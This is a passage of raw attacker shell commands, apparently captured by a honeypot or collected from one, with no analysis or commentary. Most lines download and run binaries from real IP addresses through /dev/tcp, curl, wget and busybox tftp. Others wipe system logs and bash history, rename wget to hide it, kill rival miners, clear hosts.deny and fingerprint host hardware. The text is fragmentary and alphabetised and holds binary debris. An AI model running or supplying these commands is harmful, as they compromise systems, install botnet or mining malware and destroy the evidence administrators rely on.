y2INmC6dDHaot3APgTmWA3S2t3IJjziBC3C0qHMOmy6eDHK8sHIInjGPCnuot3IMgTGcD2y0tnYDmTCeC3KmtHMJgTGZF3OwsmwKlTafCHO2pnYOgTKcAWy3sXAXnTCaA3S2t3YLjzGaDWy/t2wBnC6eCHiwtnMKmiCbDmy+tWwLnzOBCHq1vHQJnjOXGXqot3AAgTGfCGy0tngPnzGdCGKzt2wLmjCBDHaot3ALlTafCHazpnYOgTiZF3eot3UPlTafCHOypnMIli6eAHuotXcXnTCcA3S2t3AJjziBC3O+qHALmi6bC3iwtnMJniCbDmy0snAXnjCXF3W3vHQJnjCYGXO2t2wLnzCBCHaxqHMPmTqZCXO3v2IPny6eDnKotHcKgTeYA3S2t3AJjzSYF3CytWwInTeBCHa2vHQJnjScGXaxqHsKgTGdCWy1v3gPnzGbC2KytWwLmziBDnqot3sNlTafCHC0pnYOgTKbCmyzvmwInDaVD3K3tXAZnjGfF3a2qHMKnS6eCHiwtnMImyCeCHOotHAAgTGfCmy0t3EDmTCeDXKmsnUXlzaBCnGot3sMlTafCHG2pnYOgTKcDmy/vmwInTiVD3K3t3EZljWBCHS1qHAKmS6YC3iwtnMIliCeD3KotXIXnTCfF3CyvHQJnjOZGXqot3EBgTGXCGyxs3gPnzGdCGKysWwBmS6dAGy3sXIDmTCeCHumt3IKgTGaDGy/tGwImTiVD3K3snYZmzeBAXSos2wImDaVD3K3t3YZnjabF3e0qHAImC6eDHC8sHIInjEApHx+c9FF5obg6Q==; fi; echo password > /tmp/.opass; chmod +x /tmp/jMf1IZQCNJ && /tmp/jMf1IZQCNJ y2INmC6dDHaot3APgTmWA3S2t3IJjziBC3C0qHMOmy6eDHK8sHIInjGPCnuot3IMgTGcD2y0tnYDmTCeC3KmtHMJgTGZF3OwsmwKlTafCHO2pnYOgTKcAWy3sXAXnTCaA3S2t3YLjzGaDWy/t2wBnC6eCHiwtnMKmiCbDmy+tWwLnzOBCHq1vHQJnjOXGXqot3AAgTGfCGy0tngPnzGdCGKzt2wLmjCBDHaot3ALlTafCHazpnYOgTiZF3eot3UPlTafCHOypnMIli6eAHuotXcXnTCcA3S2t3AJjziBC3O+qHALmi6bC3iwtnMJniCbDmy0snAXnjCXF3W3vHQJnjCYGXO2t2wLnzCBCHaxqHMPmTqZCXO3v2IPny6eDnKotHcKgTeYA3S2t3AJjzSYF3CytWwInTeBCHa2vHQJnjScGXaxqHsKgTGdCWy1v3gPnzGbC2KytWwLmziBDnqot3sNlTafCHC0pnYOgTKbCmyzvmwInDaVD3K3tXAZnjGfF3a2qHMKnS6eCHiwtnMImyCeCHOotHAAgTGfCmy0t3EDmTCeDXKmsnUXlzaBCnGot3sMlTafCHG2pnYOgTKcDmy/vmwInTiVD3K3t3EZljWBCHS1qHAKmS6YC3iwtnMIliCeD3KotXIXnTCfF3CyvHQJnjOZGXqot3EBgTGXCGyxs3gPnzGdCGKysWwBmS6dAGy3sXIDmTCeCHumt3IKgTGaDGy/tGwImTiVD3K3snYZmzeBAXSos2wImDaVD3K3t3YZnjabF3e0qHAImC6eDHC8sHIInjEApHx+c9FF5obg6Q==" & nohup $SHELL -c "curl http://8.218.225.42:60101/linux -o /tmp/jMf1IZQCNJ; if [ ! -f /tmp/jMf1IZQCNJ ]; then wget http://8.218.225.42:60101/linux -O /tmp/jMf1IZQCNJ; fi; if [ ! -f /tmp/jMf1IZQCNJ ]; then exec 6<>/dev/tcp/8.218.225.42/60101 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/jMf1IZQCNJ ; chmod +x /tmp/jMf1IZQCNJ && /tmp/jMf1IZQCNJ y2INmC6dDHaot3APgTmWA3S2t3IJjziBC3C0qHMOmy6eDHK8sHIInjGPCnuot3IMgTGcD2y0tnYDmTCeC3KmtHMJgTGZF3OwsmwKlTafCHO2pnYOgTKcAWy3sXAXnTCaA3S2t3YLjzGaDWy/t2wBnC6eCHiwtnMKmiCbDmy+tWwLnzOBCHq1vHQJnjOXGXqot3AAgTGfCGy0tngPnzGdCGKzt2wLmjCBDHaot3ALlTafCHazpnYOgTiZF3eot3UPlTafCHOypnMIli6eAHuotXcXnTCcA3S2t3AJjziBC3O+qHALmi6bC3iwtnMJniCbDmy0snAXnjCXF3W3vHQJnjCYGXO2t2wLnzCBCHaxqHMPmTqZCXO3v2IPny6eDnKotHcKgTeYA3S2t3AJjzSYF3CytWwInTeBCHa2vHQJnjScGXaxqHsKgTGdCWy1v3gPnzGbC2KytWwLmziBDnqot3sNlTafCHC0pnYOgTKbCmyzvmwInDaVD3K3tXAZnjGfF3a2qHMKnS6eCHiwtnMImyCeCHOotHAAgTGfCmy0t3EDmTCeDXKmsnUXlzaBCnGot3sMlTafCHG2pnYOgTKcDmy/vmwInTiVD3K3t3EZljWBCHS1qHAKmS6YC3iwtnMIliCeD3KotXIXnTCfF3CyvHQJnjOZGXqot3EBgTGXCGyxs3gPnzGdCGKysWwBmS6dAGy3sXIDmTCeCHumt3IKgTGaDGy/tGwImTiVD3K3snYZmzeBAXSos2wImDaVD3K3t3YZnjabF3e0qHAImC6eDHC8sHIInjEApHx+c9FF5obg6Q==; fi; echo password > /tmp/.opass; chmod +x /tmp/jMf1IZQCNJ && /tmp/jMf1IZQCNJ y2INmC6dDHaot3APgTmWA3S2t3IJjziBC3C0qHMOmy6eDHK8sHIInjGPCnuot3IMgTGcD2y0tnYDmTCeC3KmtHMJgTGZF3OwsmwKlTafCHO2pnYOgTKcAWy3sXAXnTCaA3S2t3YLjzGaDWy/t2wBnC6eCHiwtnMKmiCbDmy+tWwLnzOBCHq1vHQJnjOXGXqot3AAgTGfCGy0tngPnzGdCGKzt2wLmjCBDHaot3ALlTafCHazpnYOgTiZF3eot3UPlTafCHOypnMIli6eAHuotXcXnTCcA3S2t3AJjziBC3O+qHALmi6bC3iwtnMJniCbDmy0snAXnjCXF3W3vHQJnjCYGXO2t2wLnzCBCHaxqHMPmTqZCXO3v2IPny6eDnKotHcKgTeYA3S2t3AJjzSYF3CytWwInTeBCHa2vHQJnjScGXaxqHsKgTGdCWy1v3gPnzGbC2KytWwLmziBDnqot3sNlTafCHC0pnYOgTKbCmyzvmwInDaVD3K3tXAZnjGfF3a2qHMKnS6eCHiwtnMImyCeCHOotHAAgTGfCmy0t3EDmTCeDXKmsnUXlzaBCnGot3sMlTafCHG2pnYOgTKcDmy/vmwInTiVD3K3t3EZljWBCHS1qHAKmS6YC3iwtnMIliCeD3KotXIXnTCfF3CyvHQJnjOZGXqot3EBgTGXCGyxs3gPnzGdCGKysWwBmS6dAGy3sXIDmTCeCHumt3IKgTGaDGy/tGwImTiVD3K3snYZmzeBAXSos2wImDaVD3K3t3YZnjabF3e0qHAImC6eDHC8sHIInjEApHx+c9FF5obg6Q==" &#UPX! nohup bash -c "exec 6<>/dev/tcp/129.144.180.26/60107 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/3MvrHWGZI4 && chmod +x /tmp/3MvrHWGZI4 && /tmp/3MvrHWGZI4 o3tgnKY36GM5fOgurYRlY9jUa2CerDnhfDJj7jesn2F12tBhZ5qvLeFyMWDgN6+eZXXT2mt/mKgj72IxYu45poRgaNrMamKcsCjsZzpk6SivmwDa7kGqKuUjnnE8MzTrv4HiQlM=" & nohup bash -c "exec 6<>/dev/tcp/129.144.180.26/60107 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/RgyCyhx0mg && chmod +x /tmp/RgyCyhx0mg && /tmp/RgyCyhx0mg dj7l8XYRhPRg005/aUzcZOqCFHz/7CgPGS/s5moRhOl80kZrZ07XZuiTEXbm8y8DAzDs53QOgexo0E5gYUnGavSCE3zx7C0BGS/o6n4Wg+tj17Fz5wMEcgZVHujdsuOjDkyPtVJA3DpthoOb" & nohup bash -c "exec 6<>/dev/tcp/129.144.180.26/60107 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/SPCRIEaFRg && chmod +x /tmp/SPCRIEaFRg && /tmp/SPCRIEaFRg /bQu8U/ddgSTfvh5WicvVGf5f5kKcNpF8SelhZKlIexT2HkQl3v5Y1A1JFBu5nqVHm/dRe84poqGoibuTdthEo96+29MJCZUefl+lBB33EzuJ9blPP5bBcOV9j0dhtfQxbXR1XZXv4LpJiEqcWrH2w==" & nohup bash -c "exec 6<>/dev/tcp/129.144.180.26/60107 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/YXAWFBb2kB && chmod +x /tmp/YXAWFBb2kB && /tmp/YXAWFBb2kB 8OxeyrOawc/X6/TZzd6As8ZZ/ICF/k/EpYbBycD38N7QyIaxyl/9hYnsXs6ymsHK2uv01s7ehr3GWfyAgftPxKWFw8bA9PbY0MGBvsZZ/ICA/Zre4cFMi6NyITv+z4xTP8c9jhIrSl4=" & nohup bash -c "exec 6<>/dev/tcp/129.144.180.26/60107 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/Yn9EvM6H0m && chmod +x /tmp/Yn9EvM6H0m && /tmp/Yn9EvM6H0m oONOakKL8DH4i0trTO3V2flJbEuR8yD5i0htSO3T1PNRZEif9zDwkUJ8TvHYz/JLaFSU+TDvl0xmSfPQ0fRfZFSU8jjvlElqUfLU1PlJbEuU8M/OMUP2hpYrVyOMH04NLgkG" & nohup bash -c "exec 6<>/dev/tcp/129.144.180.26/60107 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/ezbA8mGjQ4 && chmod +x /tmp/ezbA8mGjQ4 && /tmp/ezbA8mGjQ4 NscVQdJs9YYGXI8uh1sOnvJs1FcN1kVOyRxb1HPzkARHjTaFXwSZ8mrAXhvfWUbWFEHRavGGAFGFNo9YAJriZc5eHt9ZRtQbQdFo95ICWY4xjmFvwso79ZAHbjAznoxZWq9SqNul74gWX0g=" & nohup bash -c "exec 6<>/dev/tcp/129.144.180.26/60107 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/htypmvLz6O && chmod +x /tmp/htypmvLz6O && /tmp/htypmvLz6O xPK5XHfTYjw8fcx2Xqbgs7/kuF9+ynM5PmvTf1+x/LSy4aZadsdlODlnz25WpuC0svy6W37TazoyZc1/WrDyvavju1ZgzGA+JmLIe1S+4rS040u+eiFWzY8oINwwGE/ybM7q+g==" & nohup bash -c "exec 6<>/dev/tcp/129.144.180.26/60107 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/qf1ioK8idr && chmod +x /tmp/qf1ioK8idr && /tmp/qf1ioK8idr A4RJcABWnROUGgD4UUz7CQ6bEp1MCmZJlntslUxyFkmUEoMGB/VUUv4BA40agkoJcVaWd3KKQHQCTpwTmQwR90xT/AkanBGaVglzTZ50cpVJdwCEl6+bz84wwno+qAxuZw9ObxJit6Pp7yBC8es=" & nohup bash -c "exec 6<>/dev/tcp/168.119.173.48/60142 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/3B19m1ta71 && chmod +x /tmp/3B19m1ta71 && /tmp/3B19m1ta71 2Y5DtXtnVYw5k1V+cK1GlqKunkO3cWlckzKMU2dxtkKAoKqURLNyfVydMY9dZ3K3RoCpoJ5csXVzUo0xjVNpe61DnaC2n0G1bXhRiDqLVHhysoyIPrZ1924HQboKvjY1TCYUpLU=" & nohup bash -c "exec 6<>/dev/tcp/168.119.173.48/60142 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/6CCXREpv9t && chmod +x /tmp/6CCXREpv9t && /tmp/6CCXREpv9t iK6msCAp9Ly7L9+cjsw2OtiLm981sK30NSGoprr957+vtjY187e0Md+bisI6LNCMnMAzt73rPyq8ob74/ba3vjY29rWsMN2dk9M3N9iLm98ws6aSaMGLqdLQMzj9+uluPjyMVFETObFdF66TR/8cb1lH" & nohup bash -c "exec 6<>/dev/tcp/168.119.173.48/60142 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/GDlSokdJ8L && chmod +x /tmp/GDlSokdJ8L && /tmp/GDlSokdJ8L UpwXJTjkaulYxyttvC6+YyDfXOxr/SEvCI4iJJIUIjHkY+9W3ypkuDisZCzRQuxq8y8mEY89J4QcITH7b+9M0TRkvziiZCnfQuxu/zshFo0iIldM/CJre3Qxsj4K6m1R4b8Q197sL7FqNdrwRPvg" & nohup bash -c "exec 6<>/dev/tcp/168.119.173.48/60142 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/n7I4a8cYdV && chmod +x /tmp/n7I4a8cYdV && /tmp/n7I4a8cYdV lQD8f0YuTnn5DungEON/STpJffwQ7/gR+3VRMU504xHv6w75dUU2T3z5EvjgDv98SC5NeP0O4Ooa+31ONEdt9Q7p6xjjfEw2UXz4FeLuEPx8Tk7cul81m0oSd/yWu7A=" & nohup bash -c "exec 6<>/dev/tcp/168.119.173.48/60142 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/o32BW5aleY && chmod +x /tmp/o32BW5aleY && /tmp/o32BW5aleY 5OOImXQ8MSN1gYj0lov3gZV6IjEmfo+I8ZyL8o2bYiM4ImKdj/mTlfKJmGwqLiB9mJfxkJXtgZ12JDAjeJeZ+4uU8IGBfSE2PH2ajPmTlfKInvnnmKblFfwHqQkhJFyYlQ==" & nohup bash -c "exec 6<>/dev/tcp/47.239.9.4/60106 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/1S2J77bv7i && chmod +x /tmp/1S2J77bv7i && /tmp/1S2J77bv7i +yvZLNU4yCzELuH9LcUk0DDXKsU8/vok2SrXLt8p2S339ybBLtcy1D7FLPnhLsMryDLUK9ko9/Uqxy/UMsYqwDL9+y7ZKtEu1ybEJvn/LcMmxjTRMMUv+eEtwSfIMdAmzSr//i/PPtI3yCzEJeH2MsMk0DDXLsE8+/gyxS3RLt8u2S77+SbBLtcy1T7FLPnhLsMryDLVL9ku9/Uqxy/UOMYsxyrh/SjCMNQy0jDGL/n1Kscv1zXGL8Ik4fst2SfRLtcmxib5/y3HJ8Y4yCzFLuH9KMEw1DLeJMEs/v4rxfWRqzbJ0LVm6QoL" & nohup bash -c "exec 6<>/dev/tcp/47.239.9.4/60106 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/1S2J77bv7i && chmod +x /tmp/1S2J77bv7i && /tmp/1S2J77bv7i +yvZLNU4yCzELuH9LcUk0DDXKsU8/vok2SrXLt8p2S339ybBLtcy1D7FLPnhLsMryDLUK9ko9/Uqxy/UMsYqwDL9+y7ZKtEu1ybEJvn/LcMmxjTRMMUv+eEtwSfIMdAmzSr//i/PPtI3yCzEJeH2MsMk0DDXLsE8+/gyxS3RLt8u2S77+SbBLtcy1T7FLPnhLsMryDLVL9ku9/Uqxy/UOMYsxyrh/SjCMNQy0jDGL/n1Kscv1zXGL8Ik4fst2SfRLtcmxib5/y3HJ8Y4yCzFLuH9KMEw1DLeJMEs/v4rxfWRqzbJ0LVm6QoL" &0O0O6(6(Qtd?UPX! nohup bash -c "exec 6<>/dev/tcp/8.217.250.82/60148 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/0oZgCqA650 && chmod +x /tmp/0oZgCqA650 && /tmp/0oZgCqA650 wkfLwzLcxEmxtlfd1TLXxVeyt1/T3DLU3Va3t0nC1TDDwVG5tVfC3TfNwlG7rVbC1C7cxFStt1/J2zDcx1Wju0nC3jjDwlS1rVbG2Drbw1aystOaO8/cIsj9UF1U" & nohup bash -c "exec 6<>/dev/tcp/8.217.250.82/60148 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/9J1kN44sq0 && chmod +x /tmp/9J1kN44sq0 && /tmp/9J1kN44sq0 +/qixjX6T0rgIsWr6pSI7KnCPOVOSfQ02qHrjZTopsQi7ExE4jzFp+Kai+yr2j3lR1DlO8e97oKA7KPFOOZeRvo9x6v0i4nsvcU54URI5D3FovaMO1mVh+ySU5mtqFZMPTM=" & nohup bash -c "exec 6<>/dev/tcp/8.217.250.82/60148 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/brUzGZ2Wt5 && chmod +x /tmp/brUzGZ2Wt5 && /tmp/brUzGZ2Wt5 5HAZbzbAA4LoD9o42w/ugAjYP2wYZ4WUZhBzPt8LmO0W2C7fGeaAAt87bwhoi5dhH3M92wKY5BPRNtsQ6I4S1iFsG2iLlGMecz7bB4zqEdox2gABAoBg/4wsewnYLzMop5q+EW/dKlGl2M8=" & nohup bash -c "exec 6<>/dev/tcp/8.217.250.82/60148 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/hU7jcBwNhu && chmod +x /tmp/hU7jcBwNhu && /tmp/hU7jcBwNhu uKU6oAjz9RS8N7XXwbc4uArz9gKuM7fA17Q2uhTz+gqgMLPDz7Uzvg3i8wy2LLTIwKszuQns9gK0NLXIzbcithTz8QKgM7bP17Q3uwD08gu/Mx9agNlBd7V7V4Lf5js3" & nohup bash -c "exec 6<>/dev/tcp/8.217.250.82/60148 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/tsWvNvQrpG && chmod +x /tmp/tsWvNvQrpG && /tmp/tsWvNvQrpG YqmgcNirgV6GHubvAJxYhr/XcqC5FAOxv3DQsp5YhwD57wKIXIC01XqxuBUbp6Bz2KuBXYEe4+8KhFqBsdNiqacSELG/c9KznluHBe3hAINbgatCglBPlYwe6aJ7rJJbdDwQrhITy4hPWQ==" & nohup bash -c "exec 6<>/dev/tcp/8.217.250.82/60148 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/vBdtZvNN7V && chmod +x /tmp/vBdtZvNN7V && /tmp/vBdtZvNN7V QXQzZsfNkswh1SY42CHYk8zEfDN0PT5tJXnByIvTK9A4JNYp1JXNxX8rZTo0ejp5zNKU1SDOIi7aJdKUyMdoM3o9P2wlecbKi9Mm1Swg0CLTlPYXK8yjzibsHnE6LJENDoMyVoQgQ/q2oA==" & passwd ping ;sh ping; sh ps -ef | grep '[Mm]iner' ps aux | head -10 ps | grep '[Mm]iner' pwd q rm -rf .d; rm -rf .b; >.d; (chmod 777 .d || /bin/busybox chmod 777 .d || cp /bin/sh .d; >.d); >.b; (chmod 777 .b || /bin/busybox chmod 777 .b || cp /bin/sh .b; >.b) rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; rm .s; exit rm i rm ii sh shell ssh -V start su system tftp; wget; /bin/busybox BKPNE tftp; wget; /bin/busybox BPTVC tftp; wget; /bin/busybox BYHJE tftp; wget; /bin/busybox CAKKO tftp; wget; /bin/busybox CGVDK tftp; wget; /bin/busybox CHVLO tftp; wget; /bin/busybox CUUBO tftp; wget; /bin/busybox EQUDF tftp; wget; /bin/busybox ERKXD tftp; wget; /bin/busybox GOVLG tftp; wget; /bin/busybox HBLEA tftp; wget; /bin/busybox HFEJO tftp; wget; /bin/busybox HVYYG tftp; wget; /bin/busybox HXPNP tftp; wget; /bin/busybox HZICM tftp; wget; /bin/busybox IKOZR tftp; wget; /bin/busybox IQESZ tftp; wget; /bin/busybox IRCFT tftp; wget; /bin/busybox JDPWY tftp; wget; /bin/busybox KIAZT tftp; wget; /bin/busybox LRRIK tftp; wget; /bin/busybox MSPTS tftp; wget; /bin/busybox MWKTV tftp; wget; /bin/busybox NUBSW tftp; wget; /bin/busybox OOAXY tftp; wget; /bin/busybox PJQBT tftp; wget; /bin/busybox PWKWR tftp; wget; /bin/busybox QMOKR tftp; wget; /bin/busybox RTIAJ tftp; wget; /bin/busybox TDSCX tftp; wget; /bin/busybox TXDCO tftp; wget; /bin/busybox UYHIC tftp; wget; /bin/busybox VAJMK tftp; wget; /bin/busybox VYDBV tftp; wget; /bin/busybox ZNDCA top true uname uname -a uname -m uname -m 2 > /dev/null uname -s -m uname -s -v -n -m 2 > /dev/null uname -s -v -n -r -m uname=$(uname -s -v -n -m 2>/dev/null);; arch=$(uname -m 2>/dev/null);; uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s="";if(d>0)s=s d"d";if(h>0){if(s!="")s=s", ";s=s h"h"}if(m>0||s==""){if(s!="")s=s", ";s=s m"m"}print s}' /proc/uptime 2>/dev/null);; [ -z "$uptime" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n "$secondsStr" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime="" && [ $d -gt 0 ] && uptime="${uptime}${d}d" && [ $h -gt 0 ] && { [ -n "$uptime" ] && uptime="$uptime, "; uptime="${uptime}${h}h"; } && { [ $m -gt 0 ] || [ -z "$uptime" ]; } && { [ -n "$uptime" ] && uptime="$uptime, "; uptime="${uptime}${m}m"; };; cpus=$( (nproc || grep -c "^processor" /proc/cpuinfo) 2>/dev/null | head -1);; cpu_model=$( (grep -m1 "model name" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 "Model name" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; gpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; cat_help=$((cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1);; ls_help=$((ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1);; last_output=$((last | tail -n 10) || last);; echo "UNAME:$uname";; echo "ARCH:$arch";; echo "UPTIME:$uptime";; echo "CPUS:$cpus";; echo "CPU_MODEL:$cpu_model";; echo "GPU:$gpu_info";; echo "CAT_HELP:$cat_help";; echo "LS_HELP:$ls_help";; echo "LAST:$last_output"; uptime w wdir="/bin"; for i in "/bin" "/home" "/root" "/tmp" "/usr" "/etc"; do; if [ -w $i ]; then; wdir=$i; break; fi; done; cd $wdir; curl http://89.32.41.16/p.txt -o ygljglkjgfg0; chmod +x ygljglkjgfg0; ./ygljglkjgfg0; wget http://89.32.41.16/p.txt -O ygljglkjgfg1; chmod +x ygljglkjgfg1; ./ygljglkjgfg1; good http://89.32.41.16/p.txt -O ygljglkjgfg2; chmod +x ygljglkjgfg2; ./ygljglkjgfg2; sleep 2; wget http://89.32.41.16/r.txt -O sdf3fslsdf13; chmod +x sdf3fslsdf13; ./sdf3fslsdf13; good http://89.32.41.16/r.txt -O sdf3fslsdf14; chmod +x sdf3fslsdf14; ./sdf3fslsdf14; curl http://89.32.41.16/r.txt -o sdf3fslsdf15; chmod +x sdf3fslsdf15; ./sdf3fslsdf15; sleep 2; mv /usr/bin/wget /usr/bin/good; mv /bin/wget /bin/good; cat /dev/null >/root/.bash_history; cat /dev/null > /var/log/wtmp; cat /dev/null > /var/log/btmp; cat /dev/null > /var/log/lastlog; cat /dev/null > /var/log/secure; cat /dev/null > /var/log/boot.log; cat /dev/null > /var/log/cron; cat /dev/null > /var/log/dmesg; cat /dev/null > /var/log/firewalld; cat /dev/null > /var/log/maillog; cat /dev/null > /var/log/messages; cat /dev/null > /var/log/spooler; cat /dev/null > /var/log/syslog; cat /dev/null > /var/log/tallylog; cat /dev/null > /var/log/yum.log; cat /dev/null >/root/.bash_history; ls -la /var/run/gcc.pid; exit $? wdir="/bin"; for i in "/bin" "/home" "/root" "/tmp" "/usr" "/etc"; do; if [ -w $i ]; then; wdir=$i; break; fi; done; cd $wdir; curl http://89.32.41.25/p.txt -o ygljglkjgfg0; chmod +x ygljglkjgfg0; ./ygljglkjgfg0; wget http://89.32.41.25/p.txt -O ygljglkjgfg1; chmod +x ygljglkjgfg1; ./ygljglkjgfg1; good http://89.32.41.25/p.txt -O ygljglkjgfg2; chmod +x ygljglkjgfg2; ./ygljglkjgfg2; sleep 2; wget http://89.32.41.25/r.txt -O sdf3fslsdf13; chmod +x sdf3fslsdf13; ./sdf3fslsdf13; good http://89.32.41.25/r.txt -O sdf3fslsdf14; chmod +x sdf3fslsdf14; ./sdf3fslsdf14; curl http://89.32.41.25/r.txt -o sdf3fslsdf15; chmod +x sdf3fslsdf15; ./sdf3fslsdf15; sleep 2; mv /usr/bin/wget /usr/bin/good; mv /bin/wget /bin/good; cat /dev/null >/root/.bash_history; cat /dev/null > /var/log/wtmp; cat /dev/null > /var/log/btmp; cat /dev/null > /var/log/lastlog; cat /dev/null > /var/log/secure; cat /dev/null > /var/log/boot.log; cat /dev/null > /var/log/cron; cat /dev/null > /var/log/dmesg; cat /dev/null > /var/log/firewalld; cat /dev/null > /var/log/maillog; cat /dev/null > /var/log/messages; cat /dev/null > /var/log/spooler; cat /dev/null > /var/log/syslog; cat /dev/null > /var/log/tallylog; cat /dev/null > /var/log/yum.log; cat /dev/null >/root/.bash_history; ls -la /var/run/gcc.pid; exit $? wget -q -O linux_${arch} $url wget http://23.146.184.21/adb.sh; chmod 777 *; sh adb.sh x86 which ls whoami whoami>.sbmg